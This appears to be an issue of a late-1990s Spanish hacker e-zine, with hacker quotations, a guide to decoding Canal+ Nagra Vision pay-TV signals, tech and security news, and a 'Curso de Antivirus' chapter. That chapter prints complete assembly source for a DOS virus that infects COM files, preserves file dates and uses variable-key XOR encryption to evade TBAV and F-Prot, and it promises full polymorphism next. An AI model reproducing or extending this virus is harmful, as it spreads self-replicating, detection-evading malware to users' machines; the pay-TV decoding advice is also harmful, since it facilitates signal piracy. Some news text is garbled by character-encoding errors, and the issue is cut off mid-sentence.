@ RareGazz por publicar este documento.
║ 12.0 ║ CITAS
=-=-=
"Defendamos la libertad de expresion... es la unica arma que nos queda"
-=STAIN=-
"Liberen a Kevin Mitnik; el condor ha de volar una vez mas"
"Promuevan la descentralizacion del poder y la informacion"
"Recuerden... la verdad es barata, pero la informacion cuesta; liberen la informacion"
-=R.D.T.=-
"La informacion es poder, el poder son unos y ceros"
"Hackeemos el planeta, todos los hackers unidos"
-=Hackers, the movie=-
"Digan todo lo que tengan que decir, la comunicacion es todo"
"La informacion es la mejor arma de poder para el mago moderno"
"Nunca dejes de buscar nuevas fronteras"
"El hacker bien entendido es una especie de Robin Hood de la informacion"
-=El Chacal=-
[Ohh yes, The Chacal. The king, the god, the master of hackers. Ja, Ja, Ja]
"Usar algo no significa que te tengas que abusas de el"
-=STAIN=-
"Para ser un hacker tu objetivo primario tiene que ser aprender por el
bien de aprender, nada mas para descubrir que pasa si haces una cierta
cosa en un momento particualr y bajo una condicion especifica."
"En el siglo 21, quien controle las pantallas controlara las conciencias,
la informacion y el pensamiento."
-=Timothy Leary=-, 1921-1996
"Toda persona curiosa es un hacker potencial"
-=HBO=-
"Fuck ARiStOtlE"
-=All the [NuKe] Memberz worldwide=-
"El conocimiento es util, debe divulgarse y tiene caracter libertador ya que a
mayor instruccion correspondera mayor virtud y mayor felicidad"
-= Enciclopedia o Diccionario Razonado de
las Ciencias, de las artes y de los oficios (1751); de Diderot y D'Alembert =-
"El conocimiento es la fuerza de produccion fundamental y la informacion y su
adecuada circulacion es imprescindible para el exito de los emprendiminetos"
-= Posmodernismo =-
-- EnD oF FiLe --
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Decodificacion de sistemas Nagra Vision (canal+)
La decodificacion de sistemas basados en la tecnologia Nagra Vision es algo que se esta
poniendo muy de moda.Ya ha pasado mucho tiempo desde los primeros decodificadores de
sonido y del primer decodificador de video para este sistema.
La primera vez que tuve uno decodificador de audio fue aya por el año 1997,este no
decodificaba en tiempo real,tenias que grabar una pista codificada en Wav y pasarla
por el programa que te creaba otro Wav con la info decodificada (y una calidad bastante pesima)
Ahora las cosas van bastante mas avanzadas,un grupo de universitarios alemanes,comenzaron el
a±o pasado a fabricar los primeros decodificadores de video y audio en tiempo real.
Para funcionar requieren un equipo + o - moderno ya que logras ver bien la se±al decodificada
en un P-200 MMX con 64 de Ram pero lo decodifica,que es lo importante.
Sistemas de codificacion de se±al como los que usa canal+,son llamados Nagra Vision,este
sistema funciona de una forma silmilar al encryptado comun,solo que es capaz de hacerlo con
audio y video.El sistema empleado para esta codificacion es a base de digitos,lo que hace
exactamente es coger la se±al y dividirla en partes lineadas,cada linea lleva un codigo que
es igual a otra linea,por ejemplo la linea numero 35 lleva la misma encryptacion que la nuemero
89,pero no que la 38,por eso cuando llega la se±al a tu aparto de TV este no es capaz de
descifrarla y salen muchas rayas que distorsionan por completo la imagen.
El sonido es codificado de tal manera que le da la vuelta,lo encrypta y ademas desnivela
el nivel de ruido y distorsion,por eso no se entiende nada de lo que dicen.
Actualmente la decodificacion de nagravision es algo que esta muy estudiado y ya es posible
decodificar auido y video de una manera asequible (para el bolsillo).
Los requerimientos de procesador son los antes comentados (para una decodificacion similar a la
que te da un decodificador comprado a la empresa de TV),pero ademas tenemos que tener una
tarjeta capturadora de video que contenga el chip BT848,este chip lleva en su interior
una serie de alogaritmos que bien utilizados pueden llegar a decodificar la imagen.
En internet ya se puden encontrar muchos programas que actuan de decodificador,estos lo que
hacen es asignar unas ordenes concretas a la tarjeta caputradora para que muestre en pantalla
la emision decodificada.
Uno de los mejores programas que hay ahora mismo en la red es el Premiere,es capaz de
decodificar la se±al con una calidad digna de un decodificador comercial,la unica pega
es que al consumir mucha CPU es aconsejable tener un equipo muy potente (relativamente),
yo con un P-200 y 32 de Ram,se puede decir que,decodifico la se±al aunque va a saltos aveces.
Del sonido tamopo hay que preocuparse,ya que tambien hay muchos programas en internet que
decodifican el audio en tiempo real con una calidad aceptable,la unica pega es que
requieren una tarjeta de sonido soundblaster y es muy dificil hacerlos funcionar con otra
trajeta por muy compatible que sea.
Esto es una breve introduccion a la teoria,si quereis mas informacion,dirijiros a esta web:
http://members.xoom.com/freeways_2/
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
CURSO DE ANTIVIRUS
------------------
Tercer capítulo: ENCRIPTACION XOR DE CLAVE VARIABLE
******************************************************************************
Disposición Legal:
> Yo, el autor, declino toda responsabilidad civil y/o legal que discurra
> de la utilización fraudulenta de esta información. El responsable único
> y último ser el lector si decide usarla para dichos fines.
El autor:
Manuel Llorens.
******************************************************************************
En los siguientes capítulos vamos a ir mejorando el virus del capítulo
segundo hasta que sea indetectable por los actuales antivirus. Para ello
comenzamos con una encriptación simple. Esto evitar que los antivirus
puedan encontrar cadenas comunes entre dos versiones distintas del
virus. De momento las rutinas de encriptación permanecen sin encriptar y
son simpre idénticas por lo que aún existe una posiblidad de
identificación de cadenas. En posteriores capítulos introduciremos
polimorfismo completo. Dado lo relativamente complejo de la encriptación
(ya que lia bastante el código) prefiero llegar sólo hasta el punto
alcanzado por este virus en este capitulo:
=== ASM Begin 'v021.asm'===
; El presente listado es un virus de 285 bytes. Es capaz de infectar
; COMs que se encuentren en el directorio en el que se ejecuta. Buscar
; hasta encontrar un COM apropiado. No reinfecta. La marca de infección
; es 0fe0h a partir del tercer byte. No infectar los archivos protegidos
; contra escritura. Preserva la fecha y la hora del archivo original.
; Est encriptado con clave variable, según el host.
; Para ensamblar: TASM virus, TLINK /t virus
; Patuel
virLENGTH equ offset virEND-offset virBEGIN
encLENGTH equ offset encEND-offset encBEGIN
C_SEG segment 'CODE'
org 100h
assume cs:C_SEG,ds:C_SEG,es:C_SEG
host: jmp entry ; Saltamos al código vírico
db 0fh,0e0h
clave: db 0
virBEGIN label byte
entry: call near ptr start
start: call near ptr getbp ; Con esto evitamos al TBAV
add sp,2 ; Dejamos bien la pila
mov al,buffer+bp+5
call encrypt ; Desencriptamos
encBEGIN label byte
mov di,100h ; Principio del host
push di ; Dejamos 100h en la pila
lea si,buffer+bp
movsw ; Ahorramos bytes al no cargar CX
movsw
movsw
mov ah,1ah ; Establecer DTA en DS:DX
lea dx,virEND+bp
int 21h
mov ah,4eh ; Buscar primer archivo que coincida
lea dx,path+bp ; con la cadena en DS:DX
xor cx,cx ; Sólo archivos normales
busqueda: int 21h ; (no infectar los write protected)
jc salir ; salir si hubo error
call infect ; infectamos el archivo
salir: mov ax,cs
mov ds,ax
mov es,ax
mov ah,1ah ; Establecer DTA en DS:DX
mov dx,80h
int 21h
ret
otro: mov ah,3eh ; Cerrar el handle en BX
int 21h
mov ah,4fh ; Buscar siguiente archivo
jmp busqueda
fecha: mov ax,5701h ; Establecer fecha y hora de BX
mov cx,word ptr [virEND+bp+16h]
mov dx,word ptr [virEND+bp+18h]
int 21h
ret
infect: mov ax,3d02h ; Abrir fichero en DS:DX el lec/esc
; En el offset 1eh de la DTA est
; el nombre del archivo
lea dx,virEND+bp+1eh
int 21h
jc salir ; salir si hubo error
xchg bx,ax ; metemos en BX el handle
mov ah,3fh ; Leer CX bytes desde BX hasta DS:DX
mov cx,6
lea dx,buffer+bp ; Los metemos en el buffer
int 21h
cmp word ptr buffer+bp+3,0e00fh
je otro
cmp byte ptr buffer+bp+5,00h
jne sigue
inc byte ptr buffer+bp+5
sigue: mov ax,4202h ; Mover el puntero la cantidad CX:DX
mov cx,0ffffh ; desde el final del archivo
mov dx,-2
int 21h
mov ax,4201h ; Mover el puntero la cantidad CX:DX
xor cx,cx ; desde la posición actual
xor dx,dx
int 21h ; Nos devuelve en DX:AX la longitud
or dx,dx ; El COM es demasiado grande
jne otro
cmp ax,0ffffh-VirLENGTH
jnb otro
cmp ax,10h ; El COM es demasiado pequeño
jb otro
sub ax,3 ; Longitud menos salto inicial
mov word ptr long+bp,ax
call encrypt2 ; Encriptamos/copiamos/desencriptamos
mov ax,4200h ; Mover el puntero la cantidad CX:DX
xor cx,cx ; desde el comienzo del archivo
xor dx,dx
int 21h
mov ah,40h ; Escribir CX bytes desde DS:DX a BX
mov cx,5
lea dx,salto+bp ; Reconstrucción del salto
int 21h
call fecha
mov ah,3eh ; Cerrar el handle en BX
int 21h
ret
path db '*.COM',0
salto db 0e9h
long dw ?
marca db 0fh,0e0h
encEND label byte
buffer db 0cdh,20h,90h,?,?,0
copy: mov ah,40h ; Escribir CX bytes desde DS:DX a BX
mov cx,VirLENGTH
lea dx,VirBEGIN+bp ; Desde el comienzo del virus
int 21h
ret
encrypt2: mov al,buffer+bp+5 ; La clave de encriptación
call encrypt ; Encriptamos
call copy ; Copiamos
mov al,buffer+bp+5 ; Desencriptamos
call encrypt
ret
encrypt: lea si,encBEGIN+bp ; El encriptador/desenc.
mov cx,encLENGTH
bucle: mov ah,byte ptr [si]
xor ah,al
mov byte ptr [si],ah
inc si
loop bucle
ret
getbp: mov bp,sp ; Para calcular el δ-offset
mov bp,word ptr [bp+2]
sub bp,offset start
ret
virEND label byte
C_SEG ends
end host
=== ASM End 'v021.asm'===
Los cambios que he hecho consisten en separar la rutina de infección y
llamarla con un call y mover la clave de infección (que sigue siendo la
misma) hasta el 3 byte del archivo. Adem s he cambiado la forma de calcular
el δ-offset para que ni el TBAV ni el F-Prot puedan seguir la pista a la
encriptación ;) No creo que teng is problema en seguir estos cambios,
dado que adem s no afectan a la encriptación.
Estudiemos como se produce la encriptación:
La encriptación que vamos a realizar es un XOR simple usando una clave
variable. Para los que no lo sep is hacer un XOR tiene la inestimable
ventaja de que la misma rutina con la que encriptamos nos sirve para
desencriptar, o sea, que la encriptación de la encriptación es la
desencriptacíon %DDDDDDDDDDDDDD
No podemos encriptar todo el código vírico, dejaremos fuera alguna
rutinas. El comienzo del virus (necesitamos calcular el δ-offset antes
de desencriptar), la propia rutina de encriptación y la rutina que copia
el virus al final del host. El esquema del virus, una vez que ha
infectado su primer host (no en el falso host) es el siguiente:
Comienzo
C lculo del δ-offset
Desencriptado
Ejecución
Encriptado
Copiado al host
Desencriptado
final
Como véis primero se desencripta (estoy hablando siempre del virus en
memoria claro) de modo que el verdadero código vírico pueda ejecutarse.
Pero llegado el punto en el que debe copiarse tiene que volver a
encriptarse (con una nueva clave), ya que necesitamos que se copie
encriptado. Pero como luego tiene que continuar ejecut ndose el código
lo volvemos a desencriptar.
La clave que usaremos para encriptar/desencriptar el virus es el el
primer byte no modificado del host (offset 6 desde el comienzo del
virus) Es una forma de obtener un número 'aleatorio', aunque ser
siempre el mismo al infectar el mismo archivo.
Para usar este valor lo que hacemos es copiar al buffer los 6 primeros
bytes del virus (3 del salto, 2 de la marca de infección y el
'aleatorio'). Esta vez el buffer lo dejamos fuera de la parte
encriptada, ya que necesitamos ese valor para desencriptar ;)
Debemos saber que si hacemos un XOR con el valor 0 no encriptamos nada,
así que antes de aceptar un valor como clave lo comparamos con 0 y si lo
es lo ponemos en 1. Pero el valor 0 nos va a ser muy importante, ya que
es justo la clave que necesitamos para encriptar el falso host de modo
que esté encriptado pero esté igual que sin encriptar. Por ello como
podemos ver en el listado el valor de la clave (valor buffer+bp+5) es 0.
Pues creo que eso es todo. Como podéis comprobar con una simple
encriptación y unos cambios en la forma de calcular el δ-offset ni TBAV
ni F-Prot (ni ningún otro) son capaces de detectar el virus. El F-Prot
algunas veces (según el host) si dice algo, pero el TBAV nada de nada.
Aún así seguiremos mejorando el virus hasta que ningún antivirus, ni
scanner ni residente sea capaz de detectarlo. Entonces veremos cómo
podemos hacer un antivirus definitivo.
De momento cualquier antivirus residente lo pillar , y el TBAV aún es
capaz de extraer cadenas para localizarlo.
Esta vez he ido mucho m s r pido, el listado est menos comentado y he
detallado la explicación mucho menos, así preguntaréis m s! ;)))
Miraros bien el listado hasta comprender cómo va la encriptación porque
es algo complicadilla. Existen otras soluciones pero esta es la m s
sencilla, en el próximo capítulo aún m s mejoras ;)
Patuel ;)
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
NoTiCiAs
----------
Las opniones aqui reflejadas por los autores de las noticias no son mias,por lo tanto
puedo o no apoyar lo que se refleja en estas lineas.
***********************************************************************************************
Acceso a Internet via satelite a 6Mbps
La californiana Hughes Communications (
http://www.spaceway.com) anuncia una
nueva forma de acceder a Internet via satelite.
Basta con disponer de una antena parabolica de 66 cm de diametro, un
adaptador especial conectado al PC, y listo, comunicacion bidireccional
hacia y desde la Red -lo habitual es recibir via satelite y enviar via
linea
telefonica- a velocidades de hasta 6Mbps (unas 180 veces mas que un modem
de
33.600).
El sistema utiliza una veintena de satelites no geoestacionarios
para realizar los enlaces y opera en la banda K (de 17,7 a 30 GHz). La
unica
pega es que este nuevo sistema no entrara en funcionamiento hasta el 2002.
Mas informacion en
http://www.spaceway.com/new/press/service.html
***********************************************************************************************
MICROSOFT IMPLEMENTARIA EL PAGO DE UNA MATRICULA PARA EL USO DEL WINDOWS
Un memorandum interno de Microsoft dado a conocer el viernes en el marco
del juicio que el Departamento de Justicia de los Estados Unidos esta
llevando adelante contra el gigante del software, demuestra que la empresa
de Bill Gates esta considerando cobrarle una matrmcula anual a los usuarios
de PC por el uso del sistema operativo Windows, a partir del 2001. En un
memo enviado en diciembre de 1997 al propio Bill Gates, el vicepresidente
de ventas para los fabricantes de PC de la compaqma, Joachim Kempin, fue
quien sugiris que los usuarios de PC comenzaran a pagar una especia de
matrmcula para poder utilizar el popular OS. Actualmente se abona un
importe en tal concepto, pero es znico y esta incluido en el precio final
de venta de las computadoras. De todas maneras, de prosperar la iniciativa
no podrma ser puesta en marcha hasta el 2001, ya que Microsoft necesitarma
desarrollar una gran infraestructura a nivel mundial para poder cobrar las
matrmculas. Consultado con respecto al memo, el vocero de Microsoft Mark
Murray, coments que "no se trata de una opcisn de licencia que esta cerca
de convertirse en realidad, sslo es una simple idea que se esta evaluando".
http://www.news.com/News/Item/0,4,29088,00.html?st.ne.160.head
***********************************************************************************************
__________________________________________________________________
INTRUSOS PENETRAN EN EL SISTEMA DE CORREO DE LA UNIVERSIDAD DE STANFORD
__________________________________________________________________
Se ha sabido que el mes pasado, fueron robadas las contrase±as de mßs
de 4.500 estudiantes y profesores de la Universidad de Stanford
(California, USA).
Al parecer, los intrusos permanecieron unas tres semanas dentro del
sistema sin ser detectados. Portavoces de Stanford informaron de que
los atacantes actuaron desde Canadß y Suecia, y de que sus fines iban
mßs allß del acceso a las cuentas de correo. Stephen Hanson
(responsable de la seguridad informßtica del centro), afirm≤ no saber
si la cuenta de correo de Chelsea Clinton (hija del presidente
Clinton) estaba entre las afectadas, si bien apunt≤ a que Chelsea
dispone de varias medidas de seguridad adicionales en su cuenta
privada.
La prestigiosa Universidad de Stanford acababa de instalar nuevas
medidas de seguridad en su red informßtica, pero tal modificaci≤n fue
mal realizada en algunos ordenadores, circunstancia que los intrusos
aprovecharon en su ataque.
********************************************************************************
__________________________________________________________________
Nuevo agujero de seguridad en Netscape?
__________________________________________________________________
Georgi Guninsky (
http://www.geocities.com/ResearchTriangle/1711/), otro
infatigable descubridor de agujeros de seguridad en los navegadores, como
nuestro Cuartango, ha anunciado la semana pasada en Bugtraq que ha
descubierto una nueva vulnerabilidad en Netscape Communicator. Este fallo
permite leer ficheros del ordenador de un usuario que visite una pßgina Web
que incluya c≤digo malicioso capaz de explotar la vulnerabilidad.
La gravedad que reviste el fallo es a·n mayor si cabe, en la medida en que
no es necesario conocer la ruta de acceso del fichero, como ocurrφa con los
agujeros de Cuartango, ya que este fallo en Communicator permite examinar
directorios. Posteriormente, los contenidos del fichero recuperado podrφan
ser enviados a un host arbitrario, donde podrφan ser procesados con fines
malvados. La condici≤n necesaria para que funcione este fallo es que se
tenga activado Java y Javascript.
Soluci≤n
========
Hasta que Netscape publique un parche, la ·nica forma de protecci≤n consiste
en desactivar Java o Javascript, en Edici≤n-->Preferencias-->Avanzadas.
Demostraciones
==============
Pßgina de demostraci≤n del propio Guninsky en:
http://www.geocities.com/ResearchTriangle/1711/b6.html
Para los escΘpticos y los incrΘdulos, existen unas pßginas espectaculares
que demuestran la eficacia de este agujero en:
http://www.kics.bc.ca/~trev/cgi-bin/test.html (para usuarios de Windows)
http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (para usuarios de Unix)
***********************************************************************************************
__________________________________________________________________
CIBER-VANDALISMO EN NUEVA ZELANDA: 4.500 SITIOS WEB BORRADOS DEL MAPA
__________________________________________________________________
Ihug -proveedor de Internet radicado en Auckland, Nueva Zelanda-
comunic≤ que 4.500 sitios web a los que prestaba alojamiento mediante
un servidor localizado en California, fueron literalmente eliminados
por un intruso, en el ataque de mayor envergadura conocido en ese paφs
hasta la fecha.
Al parecer, el atacante entr≤ en el sistema gracias a un agujero de
seguridad en un script CGI, lo que le permiti≤ da±ar ficheros y
directorios a su antojo, hasta afectar a mßs de 4.500 de los 12.000
sitios web albergados. La compa±φa reconoci≤ la inexistencia de copias
adecuadas de seguridad, por lo que es de prever que bastantes usuarios
particulares (que disfrutaban de 5 MB de espacio gratuito cada uno)
habrßn perdido sus datos para siempre. TambiΘn resultaron afectadas
mßs de 500 firmas comerciales.
La empresa manifest≤ conocer ya la identidad del intruso, y estar
considerando las acciones legales oportunas. Nueva Zelanda carece de
legislaci≤n especφfica para las intrusiones electr≤nicas, aunque
pudiera ser de aplicaci≤n un caso britßnico similar acontecido en
1991, siempre que lograra acreditarse la voluntad de causar da±o.
***********************************************************************************************
La semana pasada se reunφan en Viena representantes de los 33 paφses
que suscribieron el acuerdo Wassenaar, por el que -desde hace tiempo-
se limita la exportaci≤n de material criptogrßfico hacia terceros
paφses.
Diversas organizaciones defensoras de los ciberderechos habφan
reclamado que se aprovechase esta reuni≤n para retirar de una vez las
restricciones existentes en la actualidad. Dado que este gesto
supondrφa en la prßctica la desaparici≤n de un acuerdo que hunde sus
raφces en la Guerra Frφa, razones de coherencia hist≤rica pudieran
sustentar un cierto grado de optimismo de cara a la abolici≤n del
acuerdo Wassenaar, lo que hubiera supuesto un fuerte varapalo a las
prßcticas restrictivas del otro lado del Atlßntico. Pero este no fue
el caso: los firmantes del acuerdo se reafirmaron en seguir
sustentando su plena vigencia e incluso incluyeron en el mismo saco a
productos que hasta ahora estaban exentos, debido a su amplia
difusi≤n, siempre que utilicen claves de mßs de 64 bits (caso de PGP,
sin ir mßs lejos). Un grave paso atrßs...
Los funcionarios norteamericanos no podφan ocultar su satisfacci≤n, y
no tardaron en convertir esta victoria en una especie de refrendo
internacional a su polφtica contra la libre exportaci≤n de
criptografφa. De forma casi inmediata, la agencia Reuters difundi≤ la
noticia a los cuatro vientos, siendo reflejada rßpidamente en los
principales medios informativos de la Web:
http://www.crypto.com/reuters/show.cgi?article=912708583
http://www.msnbc.com/news/220434.asp
http://www.wired.com/news/news/email/explode-infobeat/politics/story/166
23.html
El acuerdo Wassenaar "s≤lo" afecta a
la exportaci≤n de estos productos a terceros paφses no firmantes del
acuerdo, y a los que por motivos polφticos o geo-estratΘgicos, se
considera susceptibles de realizar un uso inadecuado de estas
tecnologφas. Ahora corresponde a cada paφs miembro, elaborar medidas
concretas para materializar ese acuerdo. Recordemos que Espa±a ya
regul≤ este tema no hace demasiado y cualquier cambio al respecto
generarφa sin duda una importante oposici≤n.
No obstante, no se trata precisamente de una buena noticia. Sin
tardar, los dep≤sitos de software criptogrßfico de muchos paφses
podrφan verse abocados a impedir la descarga de estos programas a
personas de otras necionalidades, al estilo de lo que nos viene
ocurriendo a los no norteamericanos si intentamos descargar este
material desde los Estados Unidos. Por otro lado, habrß que arbitrar
penas contra quienes exporten, permitan (o incluso no impidan) la
exportaci≤n de estos programas a seg·n quΘ paφses. Las empresas
productoras de software verßn limitada su competitividad en el
extranjero, tal como les viene ocurriendo a las empresas
norteamericanas. A·n mßs: ┐seguirß siendo libre la publicaci≤n de
documentos criptogrßficos en la web En fin, que la noticia no es como
para celebrarla.
Las primeras reacciones de los cibernautas no se han hecho esperar y
comienza a haber llamadas para hacer acopio de este tipo de
herramientas y establecer 'mirrors' por todos lados. La idea es buena
para el material ya existente, pero el problema seguirß afectando de
lleno a los programas que puedan elaborarse en el futuro.
Otra iniciativa curiosa es la emprendida por la empresa canadiense
Zero-Knowledge Systems Inc. Acaban de poner en marcha una pßgina web
desde la que pueden enviarse e-mail y faxes de protesta a miembros de
los gobiernos de los paφses firmantes del acuerdo de Viena:
http://www.freecrypto.org/act/
TambiΘn comienza a haber llamadas desde otros medios a huelgas de
cibernautas "a la espa±ola", etc, etc...
- ----------
Lo peor es que (con ser grave lo anterior) podrφa tener ademßs el
efecto colateral de distraer a la opini≤n p·blica de un asunto a·n mßs
preocupante si cabe: la inminente actualizaci≤n de la llamada
Resoluci≤n para la Interceptaci≤n Legal de las Telecomunicaciones, que
el Consejo de Ministros Europeos pudo tratar, a puerta cerrada, ayer
jueves. Al parecer, una filtraci≤n desde el Parlamento Europeo habla
de la inminente puesta en marcha de un sistema de monitorizaci≤n de
Internet y de las redes Iridium, GlobalStar, Odissey e ICO de
telefonφa celular vφa satΘlite, que permitirφa a la policφa acceder a
todas estas comunicaciones -y esto es lo mßs grave- SIN NECESIDAD DE
PREVIA AUTORIZACI╙N JUDICIAL. Seg·n la supuesta filtraci≤n, el FBI
estarφa colaborando en la implantaci≤n transnacional de un nuevo y
sofisticado sistema de escuchas.
El asunto estß desencadenando el malestar de algunos eurodiputados
(como Patricia McKenna, del Partido Verde IrlandΘs), que critican el
secretismo que habrφa rodeado la puesta en marcha de este plan y
reclaman la apertura de un amplio debate social, dada las
implicaciones de este tema para el derecho de los ciudadanos a la
privacidad.
Ir≤nicamente, John Pike, analista de seguridad de la Federaci≤n
Americana de Cientφficos, ve con buenos ojos la participaci≤n del FBI
en el proyecto de espiar a los ciudadanos europeos, pero considerarφa
intolerable que los europeos pudieran acceder a las comunicaciones
privadas de ciudadanos norteamericanos.
Este sφ es un asunto preocupante y de la mßxima gravedad. Para los que
se pierdan entre los vericuetos de la burocracia de Bruselas, baste
decir que un proyecto de tantφsima importancia pudiera aprobarse y
resultar vinculante sin siquiera requerir la aprobaci≤n del parlamento
europeo.
Consideramos INDISPENSABLE la lectura del artφculo completo de Wired
en:
http://www.wired.com/news/news/email/explode-infobeat/politics/story/165
88.html
- --------
La ofensiva parece bien planificada. Por un lado, se legalizan las
escuchas; por otro, se dificulta el acceso a las herramientas de
protecci≤n de la privacidad. Y dicen que lo peor estß por venir.
Este invierno se presenta caliente.
***********************************************************************************************
El protocolo de seguridad PGP se convertirß en estßndar
El protocolo de seguridad OpenPGP ha pasado la prueba de fuego al conseguir
el visto bueno de IETF (Internet Engineering Task Force) para convertirse en
propuesta de estßndar. Aunque PGP es ampliamente conocido en todo el mundo y
no existen grandes diferencias tΘcnicas de implementaci≤n, su conversi≤n en
norma garantizarß un mayor nivel de interoperatividad.
OpenPGP es la versi≤n como estßndar abierto del protocolo de cifrado PGP
(Pretty Good Privacy) de Network Associates. Aunque se le considera un rival
de la norma S/MIME (Secure Multipurpose Mail Extensions) , basada en
tecnologφa de RSA Data Security, en Network Associates piensan que lo mßs
probable es que ambas opciones coexistan.
La siguiente fase que deberß pasar PGP es la definici≤n de un borrador de
estßndar, proceso que llevarß al menos seis meses durante los cuales se
realizarßn diversas pruebas de interoperatividad entre las soluciones
existentes. Sin embargo, se espera que PGP pueda alcanzar rßpidamente ese
estado, debido a su ya larga presencia en el mercado, concretamente ocho
a±os, y al elevado n·mero de implementaciones disponibles.
http://www.idg.es/comunicaciones/detalle.asp?Secc=Tendencias&IdA=60979&Nro=1
29
***********************************************************************************************
------------------------------------------------
30 hackers podrman doblegar a EEUU
Mas de 20 naciones ya han penetrado con ixito los servicios
informaticos de Estados Unidos, introduciendo asm una nueva amenaza,
znica y potencialmente devastadora.
Lo anterior se desprende de un informe elaborado por el Centro de
Estudios Estratigicos e Internacionales (CSIS, por sus iniciales en
inglis), y que lleva el tmtulo "CyberCrime, CyberTerrorism and
CyberWarfare: Averting an Electronic Waterloo". En el informe se
seqala que elementos terroristas internacionales podrman
desestabilizar e incluso destruir sociedades - incluyendo la
estadounidense- mediante el uso de redes informaticas, sistemas de
comunicacisn y bancos de datos.
En un pasaje del documento se escribe que "en el actual entorno
electrsnico, muchos elementos hostiles podrman atacar a una de las
naciones electrsnicamente mas vulnerables del mundo". Luego, se seqala
que "los adversarios de EEUU saben que el verdadero patrimonio del
pams esta almacenado electrsnicamente. Las corporaciones virtuales,
las transacciones electrsnicas y las econommas sin inventarios -
basadas en entregas de zltima hora- harman que los ataques contra la
informacisn electrsnica sean igual de destructivos que los ataques
sobre inventarios fmsicos".
En el informe se observa ademas que "los bytes, y no las balas, son la
nueva municisn. O, mas dramaticamente, una combinacisn de bytes, balas
y bombas".
Luego se indica que "el terrorista internacional mas buscado por
EEUU", Osama bin Laden - responsabilizado por ese pams de los
recientes atentados dinamiteros contra dos de sus embajadas- se vale
de las comunicaciones fuertemente cifradas con enlace satelital
realizadas desde computadoras portatiles al momento de dialogar con su
red clandestina de asociados.
Posteriormente, se hace mencisn a que en Internet no faltan "recetas
terroristas, ademas de gumas paso a paso para hackers y
ciberterroristas".
En uno de los pasajes mas relevantes del documento se seqala que los
especialistas del Pentagono sobre guerra informatica han calculado que
EEUU podrma ser doblegado por un ataque bien preparado y bien
coordinado, realizado por 30 expertos ubicados estratigicamente en
diversos lugares del mundo.
Segzn el informe, tal ataque tendrma un costo de menos de USD 10
millones, lo que convertirma en la forma mas barata de dejar fuera de
combate a la mayor potencia del mundo. (DTI)
Mayor informacisn en
http://www.csis.org/
***********************************************************************************************
Programa extrae IE de Windows 98
Ecologista e investigador estadounidense logrs lo que Microsoft
calificaba de imposible: eliminar Internet Explorer del sistema
operativo Windows 98.
El investigador y programador Shane Brooks, adscrito a la Universidad
de Maryland, EEUU, cres un programa que bautizs 98Lite, que con sus
sslo 212 Kb tiene la funcionalidad necesaria para separar Windows 98
de Internet Explorer.
En su pagina web, Brooks presenta el programa escribiendo "␅porque
decman que no era posible". Luego, precisa que Windows es un producto
excelente que, lamentablemente, esta recargado con elementos que il,
como usuario de una computadora relativamente dibil, considera
innecesarios. De igual modo, destaca que Windows 98 tiene muchas
caractermsticas positivas que le hacen mucho mas estable y confiable
que su predecesor, Windows 95.
El investigador recalca que 98Lite no infringe las disposiciones
establecidas en la licencia para uso de Windows 98, agregando que sus
"modestos cambios" al sistema operativo no eximen al usuario de su
obligacisn de respetar las clausulas de la licencia. (DTI)
Microsoft
http://www.microsoft.com
Mayor informacisn en:
http://www.wam.umd.edu/~ssbrooks/98lite/index.html
***********************************************************************************************
En una reciente feria de muetras (Comdex), Bill Gates compar≤ la industria
informßtica cn la industrai del autom≤vil y realiz≤ las siguientes
afirmaciones:
"... si General Motors (GM) hubiera evolucianado su tecnologφa de la misma
forma que la industria de la informßtica, todos conduciriamos ahora coches
que costarφan 25 dolares y recorrerφan 1000 km, con un solo litro de
gasolina..........."
Como respuesta convoc≤ GM (el propio MR. Welch) una rueda de prensa con el
siguiente contenido:
Si General Motors hubiese desarrollado una tecnologφa como la de Microsoft
conduciriamos actualmente coches con las siguientes caracterφsticas:
1.- Su auto tendrφa sin motivo conocido dos accidentes por dφa.
2.- Cada vez que se pintasen de nuevo las lφneas de la carretera, se deberφa
comprar un coche nuevo.
3.- En ocasiones el coche se detendrφa en la autopista sin motivo conocido y
deberφa aceptarse sin mal humor , arracar el coche de nuevo y continuar la
marcha.
4.- Cuando se realizara una maniobra "especial", por ejemplo, una curva a la
izquierda, el coche se detendrφa, y no se podrφa arrancar de nuevo. Se
deberφa instalar un nuevo motor.
5.- Solo se podrφa sentar una persona por coche, a no ser que se comprara
Car98 o CarNT. En este caso se deberφa pagar por cada asiento por separado.
6.- Macintosh contruirφa automoviles que funcionarφan con energφa solar,
serφan mßs fiables, serφan dos veces mßs rßpidos y cinco veces mßs fßciles
de conducir, pero solo tendrφan un 5% del mercado.
7.- Las luces de control de aceite, y las lßmparas de aviso para temperatura
y baterφa. se sustituirφan por una lßmpara de aviso que dirφa "Fallo General
del Coche"
8.- Nuevos asientos exigirßn que todos los ocupantes tuvieran el mismo
tama±o de culo.
9.- El sistema de airbag preguntarφa ┐Estß ud seguro? antes de actuar.
10. En ocasiones el coche quedarφa cerrado sin ninguna raz≤n aparente. Solo
podrφa abrirse mediante el truco de simultaneamente tirar de la puerta,
girar la llave y con la otra mano sujetar la antena de la radio.
11.- GM le forzarφa a comprar con cada coche un accesorio de lujo de la
firma Rand McNally (filian de GM), incluso sino lo deseara o necesitara. Si
no acepta esta opci≤n, su coche circularφa un 50% mßs lento, a consecuencia
de ello GM serφa objeto de una investigaci≤n de la justicia.
12.- Siempre que GM presentara un nuevo coche, deberßn tgodos los
conductores aprender a conducir de nuevo, ya que ninguno de los mandos
funcionaria como el de los modelos anteriores.
13.- Se deberφa pulsar el boton de arranque si quisiera apagar el motor.
A estas afirmaciones, todavφa se esta a la espera de la respuesta de Bill
Gates, o de cualquier representante de Microsoft.
Sin comentarios.
***********************************************************************************************
Agujero del IIS ôGETö
Microsoft ha publicado un parche que soluciona una vulnerabilidad en su
Internet Information Server 3.0 y 4.0 que podrφa permitir ataques de
denegaci≤n de servicio contra sus servidores Web.
Esta vulnerabilidad estß relacionada con el mΘtodo GET del protocolo HTTP,
usado para recuperar informaci≤n de un servidor Web. El problema estriba en
que una petici≤n GET especialmente confeccionada puede crear una situaci≤n
de denegaci≤n de servicio que consuma todos los recursos del servidor,
ôcolgßndoloö (o dejßndolo fuera de servicio). Hay casos en que el servidor
se puede volver a poner en funcionamiento parando y rearrancando el IIS,
